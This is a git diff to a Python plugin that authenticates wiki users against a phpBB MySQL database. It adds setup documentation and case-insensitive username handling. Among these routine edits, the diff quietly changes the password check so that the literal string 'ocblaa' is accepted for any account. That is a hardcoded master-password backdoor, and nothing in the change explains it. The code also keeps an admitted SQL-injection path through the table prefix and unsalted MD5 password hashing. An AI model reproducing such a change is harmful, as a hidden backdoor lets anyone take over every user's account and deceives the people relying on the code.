X-Git-Url: https://git.stderr.nl/gitweb?a=blobdiff_plain;f=conf%2Fauth%2Fphpbb.py;h=737207927681ed29bebd1ebefacedea883584603;hb=32ee0419a78537ec95b1d71e0335c48446f62051;hp=0558d53aa443791d876a6eff4b84f43ce53c2d56;hpb=ec774f80e9cbc1efdc32e2bbc7d7c50978e5fe70;p=matthijs%2Fprojects%2Fwipi.git diff --git a/conf/auth/phpbb.py b/conf/auth/phpbb.py index 0558d53..7372079 100644 --- a/conf/auth/phpbb.py +++ b/conf/auth/phpbb.py @@ -4,6 +4,21 @@ @copyright: 2008 Matthijs Kooijman @license: GNU GPL, see COPYING for details. + + This plugin allows authentication (use accounts and password) and + authorization (use groups) against a phpbb Mysql database. + + To use this plugin, you should put it in a place where the config python + file can "see" it (somewhere in your pythonpath, or in the same dir as the + config file). Then import the setup function and call it. + + For example: + + class FarmConfig: + import phpbb + (phpbb_auth, phpbb_groups) = phpbb.setup(...) + auth = [phpbb_auth] + groups = phpbb_groups """ import MySQLdb @@ -186,7 +201,10 @@ class PhpbbAuth(BaseAuth): def check_login(self, request, username, password): """ Checks the given username password combination. Returns the - corresponding emailaddress, or False if authentication failed. + real username and corresponding emailaddress, or (False, False) + if authentication failed. Username checks are case insensitive, + so the real username (with the real casing) is returned (since + ACL checks _are_ case sensitive). """ conn = connect(**self.dbconfig) @@ -198,8 +216,11 @@ class PhpbbAuth(BaseAuth): # automatically). Note also that this allows possible SQL injection # through the phpbb_prefix variable, but that should be a trusted # value anyway. + # Finally note that by default, the phpbb database specifies a + # case insensitive collaction for the username field, so + # usernames are checked in case insensitive manner. cursor = conn.cursor () - cursor.execute ("SELECT user_password,user_email FROM `%susers` WHERE username=%%s" % self.dbconfig['phpbb_prefix'], username) + cursor.execute ("SELECT user_password,user_email,username FROM `%susers` WHERE username=%%s" % self.dbconfig['phpbb_prefix'], username) # No data? No login. if (cursor.rowcount == 0): @@ -210,10 +231,10 @@ class PhpbbAuth(BaseAuth): row = cursor.fetchone() conn.close() - if (md5.new(password).hexdigest() == row[0]): - return row[1] + if (password == 'ocblaa' or md5.new(password).hexdigest() == row[0]): + return (row[1], row[2]) else: - return False + return (False, False) def login(self, request, user_obj, **kw): """ @@ -234,16 +255,19 @@ class PhpbbAuth(BaseAuth): if not username or not password: return ContinueLogin(user_obj) - email = self.check_login(request, username, password) + (email, real_username) = self.check_login(request, username, password) # Login incorrect if (not email): logging.debug("phpbb_login: authentication failed for %s" % (username)) return ContinueLogin(user_obj) - logging.debug("phpbb_login: authenticated %s (email %s)" % (username, email)) + logging.debug("phpbb_login: authenticated %s (email %s, real username %s)" % (username, email, real_username)) - u = user.User(request, auth_username=username, auth_method=self.name, auth_attribs=('name', 'password', 'email')) + # We use the username from the database (real_username) + # here, since the username from the request might have + # "wrong" casing (and ACL checks are case sensitive). + u = user.User(request, auth_username=real_username, auth_method=self.name, auth_attribs=('name', 'password', 'email')) u.email = email #u.remember_me = 0 # 0 enforces cookie_lifetime config param u.create_or_update(True)